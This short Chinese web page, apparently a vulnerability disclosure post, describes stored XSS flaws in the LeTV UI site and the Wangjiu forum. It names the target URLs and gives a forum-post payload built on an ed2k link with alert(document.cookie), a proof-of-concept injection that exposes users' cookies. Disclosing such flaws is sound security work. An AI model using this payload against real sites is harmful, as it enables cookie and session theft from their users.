本文披露了乐视UI平台与网酒论坛存在的XSS(跨站脚本)漏洞详情,通过在发帖中插入特定代码,可触发alert弹窗显示用户cookie信息,揭示了网页安全防护的重要性。
漏洞细节
http://ui.letv.com/
http://bbs.wangjiu.com/forum.php
发贴插入ed2k://|file|test|'+alert(document.cookie)+'|test/
参见:https://bugs.shuimugan.com/bug/view?bug_no=59757
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
